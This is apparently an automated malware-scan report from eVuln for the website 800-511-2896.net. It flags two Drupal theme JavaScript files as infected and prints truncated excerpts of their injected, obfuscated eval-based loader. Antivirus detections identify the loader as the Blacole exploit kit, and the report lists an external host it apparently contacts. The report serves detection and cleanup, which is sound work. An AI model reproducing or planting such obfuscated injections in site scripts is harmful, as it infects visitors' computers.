Malware Scanner report for 800-511-2896.net

Malicious/Suspicious/Total urls checked: 2/0/7

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "800-511-2896.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=800-511-2896.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.800-511-2896.net/	200 OK Content-Length: 12103 Content-Type: text/html	clean
http://www.800-511-2896.net/misc/jquery.js?1	200 OK Content-Length: 31089 Content-Type: application/javascript	clean
http://www.800-511-2896.net/misc/drupal.js?1	200 OK Content-Length: 9834 Content-Type: application/javascript	clean
http://www.800-511-2896.net/sites/all/themes/sea_breeze/script.js?1	200 OK Content-Length: 13055 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var artEventHelper = { 'bind' : function (obj, evt, fn) { if (obj.addEventListener) obj.addEventListener(evt, fn, false); else if (obj.attachEvent) obj.attachEvent('on' + evt, fn); else obj['on' + evt] = fn; } }; var artLoadEvent = (function() { var userAgent = navigator.userAgent.toLowerCase(); var browser = { version: (userAgent.match(/.+(?:rv\|it\|ra\|ie)[\/: ]([\d.]+)/) \|\| [])[1], safari: /webk ... 3321 bytes are skipped ...1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:66:6b:27:30:1f:20:32:4:1:74:4:1:74"[hib](":");}cvfz=thxd;nhzc=[];for(ranvg=22-20-2;-ranvg+1396!=0;ranvg+=1){esat=ranvg;if((0x19==031))nhzc+=String.fromCharCode(eval(dewj+cvfz[1esat])+0xa-jahjk);}oisi=eval;oisi(nhzc)} //a9a007/script>') //339810*/ Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus JS.Exploit.BlackHole nProtect JS:Exploit.JS.Blacole.Z K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall TROJ_GEN.F47V0101 Comodo Exploit.JS.Expack.G Emsisoft JS:Exploit.JS.Blacole.Z (B) K7GW Trojan ( 85a43f9d0 ) McAfee-GW-Edition JS/Exploit-Blacole.eu DrWeb JS.IFrame.500 Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Exploit-Blacole.eu NANO-Antivirus Trojan.Script.Expack.cgzaxv F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.WS GData JS:Exploit.JS.Blacole.Z Commtouch JS/IFrame.RS ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://www.800-511-2896.net/sites/all/themes/sea_breeze/js/slidysearch.js	200 OK Content-Length: 6706 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) if (Drupal.jsEnabled) { $(document).ready(function(){ sheight = $("#metatoolbox").height(); soffset = -1 * (sheight - 14); $('#metatoolbox').css({top: soffset}); $('#metatoolbox').hover( function() {$(this).animate({top:0}, 'slow', "bounceout", function(){$('#edit-search-theme-form-1').focus();})}, ... 3105 bytes are skipped ...:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:66:6b:27:30:1f:20:32:4:1:74:4:1:74"[hib](":");}cvfz=thxd;nhzc=[];for(ranvg=22-20-2;-ranvg+1396!=0;ranvg+=1){esat=ranvg;if((0x19==031))nhzc+=String.fromCharCode(eval(dewj+cvfz[1esat])+0xa-jahjk);}oisi=eval;oisi(nhzc)} script>') //339810*/ Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall TROJ_GEN.F47V0101 Comodo Exploit.JS.Expack.G Emsisoft JS:Exploit.JS.Blacole.Z (B) K7GW Trojan ( 85a43f9d0 ) McAfee-GW-Edition JS/Exploit-Blacole.eu DrWeb JS.IFrame.500 Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Exploit-Blacole.eu NANO-Antivirus Trojan.Script.Expack.cgzaxv F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG JS/Exploit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z Commtouch JS/IFrame.RS ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://iyiokurmetal.com/r9y6mwmp.php?id=23853239	404 Not Found Content-Length: 3612 Content-Type: text/html	clean
http://iyiokurmetal.com/test404page.js	404 Not Found Content-Length: 3612 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 800-511-2896.net

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: 800-511-2896.net
Referer: http://www.google.com/search?q=800-511-2896.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Malware Scanner report for 800-511-2896.net

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools